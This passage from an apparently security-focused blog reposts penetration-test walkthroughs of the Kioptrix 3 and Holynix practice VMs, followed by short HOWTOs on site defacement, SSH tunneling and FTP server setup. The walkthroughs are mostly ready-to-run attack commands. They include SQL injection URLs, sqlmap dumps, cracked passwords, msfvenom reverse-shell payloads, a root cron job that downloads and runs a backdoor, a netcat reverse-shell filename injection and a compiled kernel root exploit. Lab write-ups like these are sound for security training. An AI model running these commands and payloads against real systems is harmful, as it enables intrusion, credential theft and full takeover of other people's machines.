Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.

Game over...again

Commands

nmap 192.168.0.* -n -sn -sP

echo 192.168.0.10 kioptrix3.com >> /etc/hosts   # It's in the readme

cat /etc/hosts

us -H -msf -Iv kioptrix3.com -p 1-65535 && us -H -mU -Iv kioptrix3.com -p 1-65535

nmap -p 1-65535 -T4 -A -v kioptrix3.com

firefox kioptrix3.com   # Link-> Blog

http://kioptrix3.com/../etc/passwd.html

# Gallery --> Source code (gadmin): http://kioptrix3.com/gallery/gadmin/

cd /pentest/exploits/exploitdb

grep -i gallarific files.csv

cat platforms/php/webapps/15891.txt

firefox kioptrix3.com/gallery/gallery.php

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='dev_accounts'),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6

echo -e "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d0  9794d8f021f40f0e" >> /tmp/hashes

cd /pentest/passwords/john

./john /tmp/hash --format=raw-md5

ssh loneferret@kioptrix3.com   # starwars

id

pwd

ls -lA

cat CompanyPolicy.README

ls -lh /etc/sudoers

cat /etc/sudoers

sudo ht   # starwars   File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save

sudo su   # starwars

id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

cd /etc/apache2/sites-enabled

ls

cat * | grep -i documentroot

exit

exit

firefox

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='gallarific_users'),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6

cd /pentest/database/sqlmap

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" -f -b --current-user --is-dba --dbs

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --users --passwords

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --file-read="/etc/passwd"

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump

http://kioptrix3.com/gallery/gadmin    # admin n0t7t1k4   Upload new pic

cd /pentest/backdoors/web/webshells

ls -lAh

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg    # msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 R

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E

firefox http://kioptrix3.com/gallery/photos/home/www/kioptrix3.com/gallery/photos/w835623l98.jpg.html

sysinfo

shell

su loneferret

echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py

python /tmp/shell.py

su loneferret   # starwars

sudo su    # starwars

cd ~

ls

cat Congrats.txt

exit

exit

exit

exit

exit

ssh loneferrt@kioptrix3.com   # starwars

cat CompanyPolicy.README

sudo ht

* * * * * root cd /tmp; wget 192.168.0.192/back.door && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit   # /etc/cron.d/exploit

msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 X > /var/www/back.door

file /var/www/back.door

/etc/init.d/apache2 start

msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E

id

uname -a

Notes

- Editing the host file is mentioned in the README which is included (as well as on the blog post).

That's all! See you.

HOWTO : Holynix - Level 1

2011-09-11T22:24:00.000+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

The Holynix series is another collection of operating systems with purposely crafted weakness(es) in them. The usual aim of a "boot-to-root"; try and get a shell with the highest user privilege you can.

Method

Scanned the network for the target (nmap)
Port scanned the host (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Bypass the login screen (SQL Injection & Cookie modification)
Collected possible usernames from harvested email addresses (Bash fu)
Discovered system usernames (Tamper Data)
Located user online directories (DirBuster)
Uploaded backdoor with spoofed credentials (Tamper Data)
Located database credentials & viewed content
Escalated privileges (Plain text credentials)
Cloned the user's port knocking profile (KnockKnock)
Discovered a vulnerable running service to gain future privileges (ChangeTrack)
Waited for the exploit to be triggered (Scheduled for ever 5 minutes)

What do I need?

holynix-v1.tar.bz2 [MD5: D19306C6C2305005C72A7811D2B72B51] – (Homepage).
A virtual machine (Example: Virtual Box or VMware Player)
Nmap – (Can be found in BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
Tamper Data – (Can be found in BackTrack 5).
DirBuster – (Can be found in BackTrack 5).
Metasploit – (Can be found in BackTrack 5).
knockknock – (Can be found in Holynix VM!)
Exploit-DB – (Can be found in BackTrack 5).
Netcat – (Can be found in BackTrack 5).

Walkthrough

To start the attack, the target needed to be identified on the network. To achieve this, the attacker used nmap's quick "ping" scan, which reveals the targets IP address and MAC address (and vendor - if known).

By using unicornscan, the attacker was able to quickly scan every TCP & UDP port, in which to see if there are any services listening. The scan showed that only TCP port 80 was open, which happens to be the default web server port. The attacker then checked the results by "banner grabbing" with nmap, which confirmed that TCP port 80 had a web server running on it and at the same time detected the type of operating system being used.

The attacker then choose to interact with the web server by viewing its contents which they were presented with a login page. As the attacker hadn't collected any possible credentials, they tried to bypass it, rather than using brute force. By trial and error the attacker soon discovered that the password field is vulnerable to a basic SQL injection. This allowed the attacker to login as the first user in the database, "alamo".

After viewing the contents of the company's internal web pages, one of the pages displayed each employee's details (name, department, telephone number and email address). To build up an inside knowledge of the company, the attacker collected these details and extracted possible usernames from the email addresses. During this process the attacker discovers that the only form of authentication is the "uid" value in the session cookie and decides to match up the collected usernames to uid values. The attacker is now able to spoof their identity - as 11 different users.

Upon exploring the web site, the attacker discovered a page which displays documents from a pre-populated list. The attacker then modified their requested file, which causes a "Local File Include" (LFI) vulnerability, which is then used to view the current page's source code. The modified request was successful and the content was display inside the current page. By looking though the source code, the attacker was able to see that the page accepted either POST or GET requests - which simplify the process. The attacker continued by requesting a known file which commonly contains details of each user on the system (/etc/passwd); this returned with the same 11 users.

The attacker tests the web server to see if "mod_userdir" is enabled, which allows users folders to be accessible via the web server. The attacker takes the list of usernames which has been collected and added a "~" (Tilde) infront of the usernames, as this is used for the "home directory", for the requested username which is followed after it. The attacker then starts DirBuster, which will request all the values on any web server and return with the HTTP code (e.g. 200=successful, 403=forbidden, etc). DirBuster was able to confirm the 11 users on the system do have their personal directories which are publicly accessible.

Another internal feature on the web server was to allow users to uploads files to their personal folders. The attacker then crafts a reverse backdoor and upload it. However, they discovered that the current user which they are logged in as, alamo, has been disabled and wasn't able to upload files. The attacker tries again, but this time spoofs the requested user ID value to another known user, which was successful. When the attacker navigates to the user folder and opens the uploaded file, to execute the PHP code inside it. They discover the permissions of the file has been altered.

The attacker goes back to the LFI, and views the source code of the upload page. After analysing the code, they discover another page handles the request. Upon viewing the contents, the attacker notices that by using compressed files, it doesn't affect the file permissions. The attacker then re-packages the backdoor file into a compressed container and uploads with the same spoofed credentials. Before executing the backdoor, the attacker sets up a listener to catch the reverse connection. Once everything is ready, the uploaded code is requested, causing Apache to execute the PHP code, creating the server to connect back to the attacker, which achieves a remote shell for the attacker to interact with the remote system.

As the web server is using an internal (MySQL) database, the attacker is aware that the credentials need to be stored in a file to allow the web server to interact with the database. As the apache user executed the backdoor, the attacker has the same privileges as the web server, which allows the attacker to read the settings file. The attacker checks a few common default locations and soon locates the settings file, with the database credentials - in plain text.

The current shell is interactive, however it is unable to run certain commands (e.g. su, login or mysql ), as they required TTY (teletypewriter). However by using python the attacker is able to bypass the limitation and locally connect to mysql with the newly acquired details.

Upon exploring the databases, the attacker sees a few "interesting" named tables, one of which is called "accounts". The attacker displays every entry into this table and discovers the 11 user accounts' details in plain text.

The attacker goes back to the web server to view the internal message board, which employees used to communicate between. One of the messages explains that there has been issues with brute force attempts on the SSH service, so a "port knocking" solution has been used. Another message explains how to setup the new feature; creating the necessary folder and extracting the user's profile into them. The attacker uses the download link and installs the program, knockknock, for themselves.

Switching back to the remote system, the attacker changes users to the first user they used at the beginning, alamo. All the passwords recorded in the database is a mixture of upper and lower case, numbers and symbols with a length greater than 12, this creates a very strong password however as the password is stored in plain text it is very weak, allowing for the user to copy and paste the credentials, becoming that user. This allows the attacker to copy alamo's knockknock profile into the user's local home folder. The attacker then simply downloads the whole content of alamo's profile via the web server and places it into the necessary folder.

The attacker starts the port knocking sequence, each time testing to see if the port has become open for a brief period of time (only a couple of seconds). After the 3rd knock, the attacker is able to connect to the SSH server, which was previously closed.

Back on the internal message board, the attacker discovers there is "changetrack" installed, configured to back up a certain folder and is scheduled to run every five minutes. This services is usually executed with the highest level of privileges, otherwise it wouldn't be able to back up everything possible. The attacker checks that the user he is using, alamo, has access to the folder which is being monitored; turns out only two users are (one of which is alamo!).

The attacker then checks a local copy of a public exploit database, exploitdb, to see if there are any known exploits for this service. There was only one result, which reveals that the service doesn't escape certain filenames, therefore filenames which have been crafted can cause the service to execute shell commands. The attacker notes the example filename, which is given, however instead of doing a "bind" connection, they choose to reserve it instead. Locally, the attacker sets up another listener, and remotely checks for, and, configures a program, netcat, which allows for the network connections to read and execute commands. The reason why the attacker flips the direction of netcat was to allow the target to establish, letting the attacker just wait, rather than for them to keep checking.

The attacker now waits for the changetrack service to be triggered, which shouldn't be long, as it was hinted in the message board; it backs up every five minutes...

...A little while later, the attacker notices that the remote system has executed their command and created a remote shell with the super user, root, account privileges.

Commands

nmap 192.168.0.0/24 -sn -n

us -H -msf -Iv 192.168.0.11 -p 1-65535 && us -H -mU -Iv 192.168.0.11 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.0.11

firefox 192.168.0.11 &   # Username: g0tmi1k   Password: ' OR 1=1 #   id: alamo

Right click -> View Page Info -> Headers

Firefox -> Directory



curl -s 192.168.0.11

curl -s --cookie "uid=1" 192.168.0.11

curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/

 /

 \n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//"

curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/

 /

 \n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//" > /tmp/users

wc -l /tmp/users

for x in $(seq 1 64); do

  y=$(curl -s --cookie "uid=$x" 192.168.0.11 | grep Welcome, | sed "s/[ \t]*//; s/Welcome, //" | cut -d "." -f1)

  if [ $y ] ; then echo $x=$y ; fi

done



Firefox -> Tools -> Tamper Data -> Start Tamper

firefox http://192.168.0.11/?page=ssp.php    # Display File

Tamper -> text_file_name: ssp.php

http://192.168.0.11//index.php?page=ssp.php&text_file_name=/etc/passwd



cat /tmp/users| sed 's/^/~/' >> /tmp/users

cd /pentest/web/dirbuster

java -jar DirBuster-0.12.jar -u http://192.168.0.11    # /tmp/users.txt



msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg



Firefox -> Tools -> Tamper Data -> Start Tamper

firefox  # Upload (fails)

Tamper -> Cookie: uid=2    # id: etenenbaum

firefox    # Upload again



firefox http://192.168.0.11/~etenenbaum/   # evil.jpg

firefox http://192.168.0.11/?page=ssp.php    # Display File

Tamper -> text_file_name: /home/etenenbaum/evil.jpg



http://192.168.0.11//index.php?page=ssp.php&text_file_name=upload.php

http://192.168.0.11//index.php?page=ssp.php&text_file_name=transfer.php



cd /tmp

mv evil.jpg evil.php

chmod +x evil.php

ls -l evil.php

tar -cvzf evil.tar.gz evil.php

ls -l evil*

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E



firefox http://192.168.0.11/~etenenbaum/



sysinfo

shell

id

pwd

ls -lah

cd /var/apache2

ls -lah

cat config.inc

python -c 'import pty; pty.spawn("/bin/sh")'

mysql -u root -pmY5qLr007p@S5w0rD

SHOW DATABASES;

USE creds;

SHOW TABLES;

SELECT * FROM accounts;

quit



firefox http://192.168.0.11/index?page=messageboard.php   # knockknock

wget http://192.168.0.11/misc/knockknock-0.7.tar.gz

tar zxvf knockknock-0.7.tar.gz

cd knockknock-0.7

head -n 20 INSTALL

python setup.py install



cd /etc/knockknock.d/profiles/

ls -lAh

cp -r alamo ~/knockknock

exit

exit

exit

exit

wget -r -np --reject=index* 192.168.0.11/~alamo/knockknock/   

mv 192.168.0.11/~alamo/knockknock ~/.knockknock/192.168.0.11

ls -lAh

#cat config

nmap -p 22 -T5 -v 192.168.0.11

#python /tmp/knockknock-0.7/knockknock.py -p 13820 192.168.0.11

python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && nmap -p 13820 -T5 -v 192.168.0.11

python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && ssh alamo@192.168.0.11   # Ih@cK3dM1cR05oF7

id

# sudo -l



firefox http://192.168.0.11/index?page=messageboard.php   # Changetrack



cd /pentest/exploits/exploitdb

grep -i changetrack files.csv

cat platforms/linux/local/9709.txt



ls -lah /home   # development is set to nobody & developers

cat /etc/group | grep developers    # Alamo jljohansen

cd /home/development

ls -lAh

whereis nc



nc -lvp 443



touch "<\`nc 192.168.0.192 443 -e \$SHELL\`"
ls
watch -d -n 1 "netstat -ant"   # wait 5 mins

id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh /root/

Notes

- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. The target will not be visible!).
- There is the possibly of another method of gaining access, as well as different tools (e.g. burpsuite instead of using tamper data) or techniques (modify the SQL injection or permanently edit the cookie value) could be used to achieve the same effect.
- Some mistakes in the video are more obvious
- On reflection, a few commands should have been issues to verify the comments on the message box, such as: "ls /etc | grep -i changetrack", and "cat /etc/changetrack.conf".

That's all! See you.

HOWTO : Holynix - Level 2

2011-09-11T22:03:00.003+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Video Links

Watch video on-line
Download video

Brief Overview

Holynix is a series of operating systems with purposely designed weakness(es) left inside. The aim of them is to go from "boot-to-root"; the user has to try and get a shell with the highest user privilege they can reach.

Method

Scanned network for the target (Netdiscover)
Configured IP address (192.168.1.0/24)
Port scanned the target (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Added the target's IP to the host file & Re-configured DNS settings
Successfully replicated the DNS databases (Zone Transfer)
Successfully brute forced web server directories (DirBuster)
Detected & exploited outdated software (phpMyAdmin)
Discovered an internal document (DirBuster)
Cracked FTP passwords (John The Ripper)
Uploaded a web backdoor (Metasploit)
Escalated privileges via a vulnerable kernel version
Located MySQL database details

What do I need?

kolynix-v2.tar.bz2 (MD5: 2B91038DE5C5150BFC48AA39C84E7E71) – (Homepage).
A virtual machine (Example: Virtual Box or VMware Player).
Netdiscover – (Can be found on BackTrack 5).
Nmap – (Can be found on BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
DirBuster – (Can be found in BackTrack 5).
Exploit-DB – (Can be found on BackTrack 5).
John The Ripper – (Can be found on BackTrack 5).
Metasploit – (Can be found on BackTrack 5).

Walkthrough

To begin, the attacker needed to locate the target. This was accomplished by using "netdiscover", as it was able to scan for hosts on multiple IP ranges quickly. The output from the scan had the target on a different IP range from the DHCP server's pool, meaning the target had a static IP address. The IP address, MAC address and vendor was now known to the attacker and they updated their IP address to fit inside the same IP range as the target.

Once the attacker was in the same subnet as the target, the attacker completed a full port scan of both TCP & UDP on the target by using "unicornscan". When the scan had finished, the results showed that the target had four TCP ports open: 21, 22, 53 & 80, as well as one UDP port, 53.

Afterwards, the attacker wanted to know what services were being used on these ports. By using "nmap" to banner grab the services, the protocols and services (and possible versions) were able to be identified, along with finger printing the operating system which was being used. The outcome of the scan revealed that the services being used matched up to their default protocol ports; ftp, ssh, dns and web services.

The attacker then proceeded by interacting with the target's web server, and by doing so, they were able to find some useful information; the domain name, name servers and each user had their own sub-domain. The attacker updates their system to reflect the newly discovered information by replacing the DNS server to point to the target.

The attacker then sets out to produce a list of possible usernames via the sub-domain by using DNS enumeration. By using "dig" the attacker was able to gather details about the domain, zincftp.com. This revealed that there were two DNS servers; the primary server was pointed to itself, the secondary server had an IP address increased by one of the primary servers. From the earlier nmap scan, the attacker knew that this IP address wasn't currently being used. The attacker then attempted a zone transfer as DNS port (TCP 53) was open, which would clone the DNS database; however it failed. But, by the attacker changing their IP address to match the secondary DNS server and re-trying the request, this time the attacker was presented with a list of all the known values for the DNS service.

The next stage was to extract a list of all known hosts from the sub-domains as well as a possible list of usernames. Upon futher inspection of the list, the attacker then filtered out all the primary server values - which left a few interesting results such as; the nameservers (which were already known), a mail server (which was on a completely different IP range) and trusted.zincftp.com.

The attacker then moves their force back to the web server. "DirBuster" was able to brute force a list of directories on a web server and check their status. In the first scan, the attacker notices two folders (/phpMyAdmin/ & /setup_guide/) which returned "HTTP response code 403 - Forbidden". The attacker then changes their IP address to match the same value as "trusted.zincftp.com" and re-open another instance of DirBuster to compare the output. After the second scan had completed, the two previous denied folders, had returned "HTTP response code 200 - OK". The attacker then chooses to view what was meant to be hidden and discovers that one page is an unprotected phpMyAdmin page as well as a directory listing which only contained one file "todo".

By exploring the phpMyAdmin page, the attacker was able to view the contents of the database which contained two usernames and their email addresses, which the attacker adds to their list of known users. Afterwards, the attacker checks the version of phpMyAdmin and notices it's a very old version and checks to see if there has been any known exploits released for it in their local copy of public exploits from "exploit-db". After checking the versions the attacker discovers that there is a remote directory traversal vulnerability.

The exploit allowed the attacker to view any files which had the same permission that phpMyAdmin was being run as. By using this, the attacker was able to discover all the user accounts on the system, by using a known file which commonly contains details of each user on the system (/etc/passwd). After analysing the file the attacker saw that not every user had shell access, and filtered these users out, as they wouldn't be able to gain remote shell. The attacker then made a note of those usernames in a separate file, as they have higher priority.

Afterwards the attacker viewed the "todo" file on the web server, which displayed the internal working of the company when a new user is added to the system. The last stage was to add them to the FTP service, allowing them to download/upload files to the server. By using the phpMyAdmin exploit, the attacker was able to read the encrypted password file which contained the user credentials.

The attacker now had a local copy of the users which were allowed to use the FTP service, along with their passwords, however, it was encrypted. The attacker then locates a small wordlist to attempt to brute force the passwords. After loading the passwords and wordlist into "John The Ripper", the attacker discovered two passwords (jack-in-the-box and millionaire) which were used (due to them being inside the wordlist), along with the two usernames (dhammond and tmartin).

As the attacker was now able to view the user web folder via [username].zincftp.com, as well as being able to interact with the ftp server, the attacker created and uploaded a small test file to see if the two services overlapped with each other. (Editor's note: The VM at this stage had "run out of room", however, after restarting the holynix virtual machine it worked). The result was the message "Hello World" was displayed, meaning; FTP & Web root folders were the same, the attacker was able execute PHP commands. From this, the attacker then crafts a web based backdoor via "metasploit", setups a listener to catch the reverse connection and repeated the same procedure as before.

As soon as the php backdoor file was opened, it connected back to the attacker giving them remote access to the system, which allowed the attacker to interact with the operating system. The attacker continued by listing all the files of each user's personal home folder. As the backdoor was executed by the web server, the backdoor inherited the same permissions, and, as the web server had to display each user folder the attacker can also do the same. There were various personal files to some users; however the attacker spotted an email, and upon reading it discovered that the user had their password reset to their name along with a few random characters. The attacker located the username the email was sent to, after looking up the user's details by using the same file as before (/etc/passwd), to discover their full name. It was also a user that had been discovered before, due to the user having permission to login remotely.

The attacker now connects to the target via "SSH" with the newly acquired details and as a result had a remote TTY shell. The attacker then checked the current kernel version, and discovered like phpMyAdmin, it was out-dated, and checks in the same manner to see if there is a public exploit for it. After locating a possible exploit, the attacker then copied it to their root web folder, checked that the file had permission to be accessed by "Apache", that there wasn't any comments at the start of the file and then started the web server, to make the file accessible to the target.

Going back to the target, the attacker navigates to a folder which they usually have write access as well as the ability to execute programs, /tmp. The attacker then downloads the exploit locally on the target and then compiles it. As soon as the newly created program had been executed the attacker became the super user, root. The attacker now has access to the complete system...

Game over

The attacker decided that they wished to harvest the system for credentials. As databases can contain valuable and sensitive information, the attacker opted to gain access. The attacker was running as root, which would allow them to reset the password to anything they wished. However, this would have caused the functionality to stop, so instead they located them (as they had to be stored somewhere allowing the web server to interact with the database). The attacker navigated to a common location for the web root folder to be, and then, by searching for all files with php extension that use a common function to connect to a MySQL database, the attacker found all the insistences of the command. The attacker was then able to view the complete file which contained the phrase, and discovered the credentials in plain text.

Commands

netdiscover

ifconfig eth0

ifconfig eth0 192.168.1.192

ifconfig eth0

us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.1.88

firefox 192.168.1.88

echo www.zincftp.com 192.168.1.88 >> /etc/hosts

cat /etc/hosts

echo nameserver 192.168.1.88 > /etc/resolv.conf

cat /etc/resolv.conf

dig zincftp.com @192.168.1.88

dig AXFR zincftp.com @192.168.1.88

ifconfig eth0 192.168.1.89

dig AXFR zincftp.com @192.168.1.88

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq > /tmp/hosts

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq > /tmp/users

dig AXFR zincftp.com @192.168.1.88 | grep -v 192.168.1.88 | grep -v ";"

BackTrack -> Vulnerability Assessment -> Web Application  Assessment -> Web Application Fuzzers -> DirBuster   #  http://192.168.1.88  directory-list-2.3-medium.txt

ifconfig eth0 192.168.1.34

BackTrack -> Vulnerability Assessment -> Web Application  Assessment -> Web Application Fuzzers -> DirBuster   #  http://192.168.1.88  directory-list-2.3-medium.txt

Right Click -> Open In Broswer   # /phpMyAdmin/   /setup_guide/

phpMyAdmin -> zincftp_data -> browse   # shanover & lbaumann

phpMyAdmin -> home -> changelog

cd /pentest/exploits/exploitdb

grep -i phpmyadmin files.csv

perl platforms/php/webapps/1244.pl

perl platforms/php/etc/passwd

perl platforms/php/etc/passwd | grep /bin/bash | cut -d ":" -f1

perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/  ../../../../../etc/passwd | grep /bin/bash | cut -d ":" -f1 >  /tmp/sshUsers

firefox http://192.168.1.88/setup_guide/ -> todo

perl platforms/php/etc/pure-ftpd/pureftpd.passwd

perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/

perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/ > /tmp/ftpUsers



cd /pentest/passwords/john

find / -name password.lst

wc -l /pentest/passwords/wordlists/darkc0de.lst

wc -l /opt/framework3/msf3/data/john/wordlists/password.lst   # Much smaller, therefore quicker!

./john --wordlist=/opt/framework3/msf3/data/john/wordlists/password.lst /tmp/ftpUsers   # --rules

ftp 192.168.1.88   # dhammond jack-in-the-box

ls

cd web



echo "" > test.php 



put test.php



curl dhammond.zincftp.com/test.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 -f raw > evil.php

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 E



put evil.php



curl dhammond.zincftp.com/evil.php && exit



sysinfo

shell

id

python -c 'import pty; pty.spawn("/bin/sh")'

ls -lAhR /home

cat /home/amckinley/my_key.eml   #first and last name, all lower case, followed by 2ba9

grep amckinley /etc/passwd    # Agustin Mckinley

exit



quit

ssh amckinley@zincftp.com   # agustinmckinley2ba9

id

uname -a



exit

exit

exit

cd /pentest/explotis/exploitdb

grep -i "linux kernel 2.6"  files.csv | grep -i root   #| uniq   # grep -i dos

cp platforms/linux/local/5092.c /var/www/exploit.c

/etc/init.d/apache2 start

ls -l /var/www/exploit.c

head -n 20 /var/www/exploit.c   # Check to make sure vaild code



cd /tmp

ls -la

wget 192.168.1.34/exploit.c

gcc exploit.c -o root

ls -la

./root

id && ifconfig && uname -a && cat /etc/shadow && ls -lahR /root

cd /var/www

find ./ -name *.php -print0 | xargs -0 grep -i -n "mysql_connect"

cat dev/dbconn.php

cat htdocs/dbconn.php

Notes

- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
- The user names which were collected were not essential for this, however this was included to demonstrate the techniques.
- On reflection, DirBuster was only used to visible compare the HTTP codes, depending on the IP address used. This could of been achived manually as checking "/phpMyAdmin/" is highly recommend (along with "/robots.txt" for example). Then by using the phpMyAdmin exploit, viewing the file "/etc/apache2/sites-enabled/000-default" would have revealed "/setup_guides/".
- Some mistakes in the video are more obvious.
- This video has been "over-edited" more than most of the other videos as it was made to fix the length of music.

That's all! See you.

HOWTO : Deface a website fast

2011-09-11T20:52:00.002+08:00

*** Do NOT attack any website without authorization or you may put into jail. ***

Credit to : pr0xzy

This is not my work. I re-post it here for educational purpose only.

Command

<meta http-equiv="refresh" content="0; URL=http://some.domain.com"/>

That's all! See you.

HOWTO : SSH Tunneling - Remote Port Forwarding

2011-09-04T08:57:00.008+08:00

WARNING : Do NOT attack any computer or network without authorization or you will be put into jail.

Scenario :

Victim Machine A and B (both are Windows XP machines) are in the same internal network. Victim A is connected to the internet while B is not.

Attacker gets the remote shell of A in the first hand and then further gets the remote shell of B by the SSH tunneling technique.

Background Music :

Infected Mushroom 09 Franks (by Offensive Security)

Operating Systems on VirtualBox :

(1) Back|Track 5 R1
(2) Windows XP SP1 (Traditional Chinese)

That's all! See you.

HOWTO : SSH Tunneling with Dynamic Port Forwarding

2011-09-03T00:15:00.004+08:00

To ensure your connection under encrypted without changing the installation or configuration of application softwares.

Step 1 :

Download the following file on the SSH server (any computer that will be running 24/7, the most perfect) on any computer outside your network.

sudo apt-get update

sudo apt-get install openssh-server

PART I - FIREFOX

Step 2 :

Open Firefox and select "Edit" -- "Preference". "Advanced" -- "Network" -- "Connection".

Select "Manual Proxy setting".

SOCKS Host : localhost

Port : 1080

Step 3 :

Go the the address entry field.

about:config

search for "network.proxy.socks_remote_dns" and double click it to set it to "true".

Close the Firefox.

PART II - FILEZILLA

Step 4 :

Open Filezilla. "Edit" -- "Settings" -- "Common Proxy".

Select "SOCKS 5"

Proxy Host : localhost

Proxy Port : 1080

Proxy User : <Your username>

Proxy Password : <Your password>

PART III - FINAL

Step 5 :

Open a terminal.

ssh -C -D 1080 <SSH Server IP or Hostname>

Enter your password.

Remarks :

Make sure the terminal window keeping open. Otherwise, the SSH tunneling will quit.

Step 6 :

Restart Firefox and surf the internet. And use Filezilla to download or upload files.

That's all! See you.

HOWTO : Pure-ftpd and atftpd on Back|Track 5

2011-08-23T19:22:00.002+08:00

You may use FTP and/or atftpd services on Back|Track 5. The following tutorial is showing you how to set it up on Back|Track 5.

PART I - PURE-FTPD

Step 1 :

apt-get install pure-ftpd

Step 2 :

cd /etc/pure-ftpd/conf/

echo ,21 > Bind

Step 3 (Optional) :

If you are behind NAT, you should set the following. The IP of your machine is suppose to be 192.168.1.1 and the passive ports are between 5000 and 5600.

echo 192.168.1.1 > ForcePassiveIP

echo 5000 5600 > PassivePortRange

Step 4 (Optional) :

The following settings are for security only. It is optional :

echo yes > ChrootEveryone

echo yes > ProhibitDotFilesRead

echo yes > ProhibitDotFilesWrite

echo yes > NoChmod

echo yes > BrokenClientsCompatibility

Step 5 :

The following settings are for preventing abuse :

echo 4 > MaxClientsPerIP

echo 20 > MaxClientsNumber

Step 6 :

To use PureDB authentication :

echo no > PAMAuthentication

echo no > UnixAuthentication

echo /etc/pure-ftpd/pureftpd.pdb > PureDB

ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/50pure

Step 7 :

groupadd -g 2001 ftpgroup

useradd -u 2001 -s /bin/false -d /bin/null -c "pureftpd user" -g ftpgroup ftpuser

Step 8 :

Create a virtual user - samiux :

pure-pw useradd samiux -u ftpuser -d /ftphome/

pure-pw mkdb

*** "pure-pw mkdb" should be issued when a new user is added.

*** Make sure you have a directory /ftphome.

Step 9 :

Add TLS/SSL support and generate a private certificate :

cd /etc/pure-ftpd/conf/

echo 1 > TLS

openssl req -x509 -nodes -newkey rsa:1024 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem



chmod 600 /etc/ssl/private/pure-ftpd.pem

Restart the pure-ftpd (or reboot your system) :

/etc/init.d/pure-ftpd restart

Remarks :

I encounter a problem when login to the pure-ftp as invalid username and password. I reboot the system and the problem gone.

PART II - ATFTPD

Step a :

cp /etc/default/atftpd /etc/default/atftpd-old



nano /etc/default/atftpd

Step b :

Change the content as is :

USE_INETD=false

OPTIONS="--tftpd-timeout 300 --retry-timeout 5 --maxthread 100 --verbose=5 --daemon --port 69 /tftpboot"

Step c :

/etc/init.d/atftpd restart

